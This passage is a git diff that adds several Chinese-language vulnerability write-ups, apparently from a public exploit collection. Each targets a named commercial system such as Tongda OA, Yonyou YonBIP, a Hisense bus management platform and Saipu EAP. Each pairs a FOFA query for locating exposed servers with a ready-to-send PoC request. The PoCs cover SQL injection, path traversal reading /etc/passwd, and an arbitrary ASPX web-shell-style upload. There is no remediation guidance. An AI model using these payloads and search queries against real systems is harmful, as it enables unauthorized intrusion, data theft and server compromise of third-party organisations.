+{"token":"4e28b56969e59a18d72d0050a47f812a","user":"superman","acctid":"-1' or
+1=if(1=1*,1,2) limit 0,1 -- a","index":"1"}</data>
+</getAccountDetail>
+</SOAP-ENV:Body></SOAP-ENV:Envelope>
+```
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/vllWjQIXB7vQR0IjUgXpww
--- a/微信公众号商家收银台小程序系统/微信公众号商家收银台小程序系统存在前台SQL注入漏洞.md
+++ b/微信公众号商家收银台小程序系统/微信公众号商家收银台小程序系统存在前台SQL注入漏洞.md
@ -0,0 +1,19 @@
+# 微信公众号商家收银台小程序系统存在前台SQL注入漏洞
+
+微信公众号商家收银台小程序系统存在前台SQL注入漏洞，/system/platform/controller/index.php 登录控制器中的api_login_check 方法，通过POST传入username,password,code 三个参数之后直接进入到SQL查询中，且未有任何过滤，导致漏洞产生。
+
+## fofa
+
+```javascript
+"/index.php?s=platform/index/captcha"
+```
+
+## poc
+
+```javascript
+1' OR 1=1 OR '1'='1
+```
+
+![d1c295315cc728f91214a29ba6a8c463](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141432533.jpg)
+
+![98204052f465039cbf5a08afb6382c71](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141432078.jpg)
--- a/海信智能公交企业管理系统/海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞.md
+++ b/海信智能公交企业管理系统/海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞.md
@ -0,0 +1,21 @@
+# 海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞
+
+海信智能公交企业管理系统 OrgInfoMng.aspx 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+body="var _FactoryData"
+```
+
+## poc
+
+```javascript
+GET /Erp/ErpAdmin/Form/OrgInfoMng.aspx?RSID=1%27+AND+9512%3DCTXSYS.DRITHSX.SN%289512%2C%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289512%3D9512%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29%29--+sfjW HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+```
+
+![image-20241114142404785](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141424857.png)
--- a/用友OA/用友YonBIP高级版yonbiplogin存在任意文件读取漏洞.md
+++ b/用友OA/用友YonBIP高级版yonbiplogin存在任意文件读取漏洞.md
@ -0,0 +1,22 @@
+# 用友YonBIP高级版yonbiplogin存在任意文件读取漏洞
+YonBIP用友商业创新平台，是用友在数字经济时代面向成长型、大型企业及巨型企业，融合了先进且高可用技术平台和公共与关键商业应用与服务，支撑和运行客户的商业创新（业务创新、管理变革），并且具有数字化、智能化、高弹性、安全可信、社会化、全球化、平台化、生态化等特征的综合型服务平台。用友YonBIP高级版yonbiplogin存在任意文件读取漏洞
+
+## fofa
+```javascript
+title="YonBIP" || title="数字化工作台"
+```
+
+![](https://cdn.nlark.com/yuque/0/2023/png/1622799/1699617335151-ab45cdc1-ba2a-4518-8a9d-5aa6a95e7263.png)
+
+## poc
+```plain
+GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Connection: close
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip, deflate, br
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731492309168-0423a749-4e24-497f-81f0-6ca9908af8d6.png)
+
--- a/美团代付微信小程序系统/美团代付微信小程序系统read.php任意文件读取漏洞.md
+++ b/美团代付微信小程序系统/美团代付微信小程序系统read.php任意文件读取漏洞.md
@ -0,0 +1,26 @@
+# 美团代付微信小程序系统read.php任意文件读取漏洞
+
+美团代付微信小程序系统 read.php 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+body="/h5/static/js/chunk-vendors.js"
+```
+
+## poc
+
+```javascript
+POST /static/ueditor22/_test/tools/br/read.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+name=../../../../../../../../../etc/passwd
+```
+
+![image-20241114142630011](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141426075.png)
--- a/赛普/赛普EAP企业适配管理平台Upload存在任意文件上传漏洞.md
+++ b/赛普/赛普EAP企业适配管理平台Upload存在任意文件上传漏洞.md
@ -0,0 +1,36 @@
+# 赛普EAP企业适配管理平台Upload存在任意文件上传漏洞
+赛普EAP企业适配管理平台，是一款专门为房地产企业打造的数字化管理系统，旨在帮助企业实现业务流程的优化、管理效率的提升和客户体验的改善。系统集成了项目管理、销售管理、客户关系管理、财务管理、报表分析等多个模块，能够满足企业不同层级、不同部门的管理需求。通过采用灵活的配置机制，该系统可以根据不同企业的需求进行定制化配置，实现与企业业务的完美契合。赛普EAP企业适配管理平台Upload存在任意文件上传漏洞
+
+## fofa
+```javascript
+body="IDWebSoft/"
+```
+
+## poc
+```java
+POST /IDWebSoft/Common/Handler/Upload.aspx HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Priority: u=0
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: multipart/form-data; boundary=---------------------------328367279028471380642525145085
+Accept: */*
+Content-Length: 44892
+
+-----------------------------328367279028471380642525145085
+Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
+Content-Type: image/png
+
+<% response.write("drwc2nymcirgr7r2bdgb111")%>
+-----------------------------328367279028471380642525145085--
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731434585150-3f3a308b-bfc8-477d-9e09-0b93e43169dc.png)
+
+```java
+/IDWebSoft/Accessary/2024/11/cf9ebf1f-04f9-47f7-b2a3-aa22f74cf825.aspx
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731434601172-28e5ec47-8721-41eb-9010-76dce5d3d1a8.png)
+
--- a/通达OA/通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600).md
+++ b/通达OA/通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600).md
@ -0,0 +1,28 @@
+# 通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600)
+
+pda/appcenter/submenu.php 未包含inc/auth.inc.php且 $appid 参数未用'包裹导致前台SQL注入
+
+## 影响范围
+
+v2017-v11.6
+
+## fofa
+
+```javascript
+app="TDXK-通达OA" && icon_hash="-759108386"
+```
+
+## poc
+
+```javascript
+http://192.168.0.106/pda/appcenter/submenu.php?appid=1%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)
+```
+
+![53147e26ebbc31217d5db726977a1f4f](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411101147145.png)
+
+
+
+## 漏洞来源
+
+- https://github.com/LvZCh/td/issues/3
+- https://mp.weixin.qq.com/s/TL1QWIpSpnrqcJ4rTXTTdQ